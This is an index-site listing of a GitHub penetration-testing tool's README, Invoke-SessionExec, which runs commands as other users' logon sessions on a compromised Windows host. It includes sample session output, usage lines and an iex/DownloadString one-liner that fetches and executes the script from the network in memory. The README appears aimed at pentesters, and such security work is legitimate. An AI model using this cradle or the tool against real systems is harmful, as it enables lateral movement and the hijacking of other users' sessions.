Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/the-viper-one/invoke-sessionexec
Execute commands in context of a user logon session
lateral pentest powershell sessionexec
- Host: GitHub
- URL: https://github.com/the-viper-one/invoke-sessionexec
- Owner: The-Viper-One
- Created: 2024-07-23T19:27:44.000Z (6 months ago)
- Default Branch: main
- Last Pushed: 2024-08-07T07:28:52.000Z (6 months ago)
- Last Synced: 2024-08-07T11:14:58.324Z (6 months ago)
- Topics: lateral, pentest, powershell, sessionexec
- Language: PowerShell
- Size: 17.6 KB
- Stars: 4
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# Invoke-SessionExec
Invoke-SessionExec is a PowerShell port of Leo4j's SessionExec. https://github.com/Leo4j/SessionExec
Invoke-SessionExec allows you to execute commands in the context of other users from their logon sessions.
For example, running as the user "truth" on a compromised host, we can see logon sessions for the users administrator and arbiter:
```
C:\Users\truth>quser
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>truth                 console             1  Active       none  23/07/2024 19:43
 administrator                             2  Disc        20:53  23/07/2024 18:02
 arbiter                                   3  Disc        20:52  23/07/2024 18:03
```

After elevating to SYSTEM and executing Invoke-SessionExec with `Invoke-SessionExec -SessionID All -Command "whoami"`, we get the following command output from each user with a logon session on the system:
```
[+] Invoke Command as truth under Session ID:1
security\truth
[+] Invoke Command as administrator under Session ID:2
security\administrator
[+] Invoke Command as arbiter under Session ID:3
security\arbiter
```

# Load into memory
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/The-Viper-One/Invoke-SessionExec/main/Invoke-SessionExec.ps1')
```

# Usage
```powershell
# Execute as user in Session 1
Invoke-SessionExec -SessionID 1 -Command "whoami /all"

# Execute as all users with logon sessions
Invoke-SessionExec -SessionID All -Command "whoami /all"
```